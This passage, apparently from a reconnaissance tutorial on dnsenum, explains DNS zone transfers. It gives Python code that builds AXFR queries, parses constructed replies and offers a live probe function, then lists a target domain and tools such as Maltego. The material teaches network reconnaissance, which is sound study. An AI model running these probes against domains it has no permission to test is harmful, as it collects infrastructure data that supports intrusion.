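What dnsenum is doing in the "Trying Zone Transfers" step, shown at the wire level as an added example (this is not dnsenum's code and not part of the original post): a zone transfer is a DNS query of type AXFR (252) sent over TCP with the two-byte length prefix, and the server either streams the whole zone (beginning and ending with the SOA record), answers with a non-zero rcode such as REFUSED, or returns NOERROR with nothing in it, which is the case reported above. The three replies below are constructed by hand for the demonstration (the SOA contents are invented); nothing touches the network unless you call try_axfr() yourself against a server you are allowed to query.

```python
"""Build a DNS AXFR request and classify a server's reply.
Added example, not part of the original post or of dnsenum. Sample replies are constructed.
"""
import socket
import struct

QTYPE_A, QTYPE_SOA, QTYPE_AXFR, QCLASS_IN = 1, 6, 252, 1
RCODE_NAMES = {0: "NOERROR", 1: "FORMERR", 2: "SERVFAIL", 3: "NXDOMAIN",
               4: "NOTIMP", 5: "REFUSED", 9: "NOTAUTH"}


def encode_name(name: str) -> bytes:
    """'is2c-dojo.com' -> b'\\x09is2c-dojo\\x03com\\x00' (length-prefixed labels)."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        if not 0 < len(raw) < 64:
            raise ValueError("bad label: %r" % label)
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def build_axfr_query(zone: str, txid: int = 0x1234) -> bytes:
    """AXFR query with the 2-byte length prefix DNS uses over TCP (AXFR is TCP-only)."""
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)   # id, flags, qd, an, ns, ar
    msg = header + encode_name(zone) + struct.pack(">HH", QTYPE_AXFR, QCLASS_IN)
    return struct.pack(">H", len(msg)) + msg


def skip_name(msg: bytes, off: int) -> int:
    """Advance past a name, handling the 2-byte compression pointer form."""
    while True:
        length = msg[off]
        if length == 0:
            return off + 1
        if length & 0xC0 == 0xC0:
            return off + 2
        off += 1 + length


def parse_response(msg: bytes) -> dict:
    """Header fields plus the record types in the answer section."""
    txid, flags, qd, an, _ns, _ar = struct.unpack(">HHHHHH", msg[:12])
    off = 12
    for _ in range(qd):
        off = skip_name(msg, off) + 4                      # QTYPE + QCLASS
    types = []
    for _ in range(an):
        off = skip_name(msg, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack(">HHIH", msg[off:off + 10])
        off += 10 + rdlen
        types.append(rtype)
    return {"id": txid, "rcode": RCODE_NAMES.get(flags & 0xF, str(flags & 0xF)),
            "answers": an, "types": types}


def classify_axfr(msg: bytes) -> str:
    """The one-line verdict: transferred, refused (rcode), or empty NOERROR as seen above."""
    r = parse_response(msg)
    if r["rcode"] != "NOERROR":
        return "refused (%s)" % r["rcode"]
    if r["answers"] >= 2 and r["types"][0] == QTYPE_SOA and r["types"][-1] == QTYPE_SOA:
        return "zone transferred (%d records)" % r["answers"]
    return "no records returned (NOERROR)"


def try_axfr(zone: str, server: str, timeout: float = 5.0) -> str:
    """Live check over TCP/53; classifies the first message the server sends back."""
    with socket.create_connection((server, 53), timeout=timeout) as s:
        s.sendall(build_axfr_query(zone))
        (length,) = struct.unpack(">H", s.recv(2))
        data = b""
        while len(data) < length:
            chunk = s.recv(length - len(data))
            if not chunk:
                break
            data += chunk
    return classify_axfr(data)


def _reply(txid: int, rcode: int, zone: str, rrs) -> bytes:
    """Constructed server reply: QR=1, echoes the question, then (type, rdata) records."""
    header = struct.pack(">HHHHHH", txid, 0x8000 | rcode, 1, len(rrs), 0, 0)
    body = encode_name(zone) + struct.pack(">HH", QTYPE_AXFR, QCLASS_IN)
    for rtype, rdata in rrs:
        body += b"\xC0\x0C" + struct.pack(">HHIH", rtype, QCLASS_IN, 3600, len(rdata)) + rdata
    return header + body


ZONE = "is2c-dojo.com"
SOA_RDATA = (encode_name("ns1.partnerit.us") + encode_name("hostmaster.is2c-dojo.com")
             + struct.pack(">IIIII", 2012012701, 14400, 3600, 1209600, 86400))  # invented
REPLY_REFUSED = _reply(0x1234, 5, ZONE, [])
REPLY_EMPTY = _reply(0x1234, 0, ZONE, [])
REPLY_FULL = _reply(0x1234, 0, ZONE, [(QTYPE_SOA, SOA_RDATA),
                                      (QTYPE_A, bytes([67, 222, 154, 106])),
                                      (QTYPE_SOA, SOA_RDATA)])

if __name__ == "__main__":
    for label, reply in (("refused", REPLY_REFUSED), ("empty", REPLY_EMPTY), ("full", REPLY_FULL)):
        print("%-8s %s" % (label, classify_axfr(reply)))
```

A real transfer can span several DNS messages on the same TCP connection; the function above stops after the first one, which is enough to tell the three outcomes apart.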
  C. domain : spentera.com
1. Using Maltego 

2. Using domaintools